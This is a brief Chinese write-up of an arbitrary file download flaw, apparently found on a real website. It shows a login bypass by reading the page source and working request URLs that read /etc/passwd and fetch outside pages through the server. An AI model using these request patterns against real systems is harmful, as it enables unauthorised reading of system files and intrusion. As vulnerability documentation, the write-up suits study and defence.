打开网站后发现有下载功能,但是需要登录
    图片.png
    可是这位前端开发人员都把东西加载完了,这个登录有什么必要呢,我直接F12看源代码

    图片.png
    直接找到了我亲爱的下载链接

    复制到地址栏
    https://x.x.x.x/downFile?name=/cn/Day1-Guo_Ping-Working_Together_for_a_Better_World.pdf&file=https://x.x.x.x/cn/ay1-Guo_Ping-Working_Together_for_a_Better_World.pdf

    name下载后的名字,file是要下载的文件名字,经典的人员文件下载漏洞

    https://x.x.x.x/downFile?name=/cn/Day1-Guo_Ping-Working_Together_for_a_Better_World.pdf&file=/etc/passwd
    你不仅仅可以下载passwd,你甚至可以通过这个网站下载百度主页

    https://x.x.x.x/downFile?name=/cn/Day1-Guo_Ping-Working_Together_for_a_Better_World.pdf&file=https://www.baidu.com